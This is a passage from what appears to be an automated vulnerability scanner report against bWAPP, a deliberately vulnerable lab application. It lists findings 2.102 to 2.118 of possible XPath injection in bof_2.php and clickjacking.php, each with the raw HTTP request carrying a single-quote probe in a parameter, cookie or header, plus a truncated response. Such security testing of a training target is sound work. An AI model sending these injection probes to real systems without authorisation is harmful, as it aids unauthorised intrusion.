Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.102. http://192.168.52.147/bWAPP/bof_2.php [form_security_level parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The form_security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

form_security_level=submit'&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:15:31 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12971

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.103. http://192.168.52.147/bWAPP/bof_2.php [movie_genre cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The movie_genre cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the movie_genre cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror'

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:12 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.104. http://192.168.52.147/bWAPP/bof_2.php [name of an arbitrarily supplied URL parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php?1'=1 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:44 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.105. http://192.168.52.147/bWAPP/bof_2.php [name of an arbitrarily supplied body parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit&1'=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:33 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.106. http://192.168.52.147/bWAPP/bof_2.php [secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:13:49 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.107. http://192.168.52.147/bWAPP/bof_2.php [security_level cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:13:40 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.108. http://192.168.52.147/bWAPP/bof_2.php [security_level parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

form_security_level=submit&security_level=1'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:15:44 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12968

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.109. http://192.168.52.147/bWAPP/clickjacking.php [Base64-decoded value of the secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Issue detail

The Base64-decoded value of the secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Base64-decoded value of the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2fJw%3d%3d

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:17:46 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: DENY
Connection: close
Content-Type: text/html
Content-Length: 13404

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.110. http://192.168.52.147/bWAPP/clickjacking.php [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:33:05 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: DENY
Connection: close
Content-Type: text/html
Content-Length: 13404

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.111. http://192.168.52.147/bWAPP/clickjacking.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:20:21 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: DENY
Connection: close
Content-Type: text/html
Content-Length: 13404

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.112. http://192.168.52.147/bWAPP/clickjacking.php [bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:16:49 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.113. http://192.168.52.147/bWAPP/clickjacking.php [form_bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:17:08 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.114. http://192.168.52.147/bWAPP/clickjacking.php [form_security_level parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Issue detail

The form_security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

form_security_level=submit'&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:16:51 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: DENY
Connection: close
Content-Type: text/html
Content-Length: 13404

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.115. http://192.168.52.147/bWAPP/clickjacking.php [name of an arbitrarily supplied URL parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/clickjacking.php?1'=1 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:18:01 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: DENY
Connection: close
Content-Type: text/html
Content-Length: 13404

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.116. http://192.168.52.147/bWAPP/clickjacking.php [name of an arbitrarily supplied body parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

form_security_level=submit&security_level=1&1'=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:17:55 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: DENY
Connection: close
Content-Type: text/html
Content-Length: 13404

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.117. http://192.168.52.147/bWAPP/clickjacking.php [secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:17:35 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: DENY
Connection: close
Content-Type: text/html
Content-Length: 13404

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.118. http://192.168.52.147/bWAPP/clickjacking.php [security_level cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:17:28 GMT
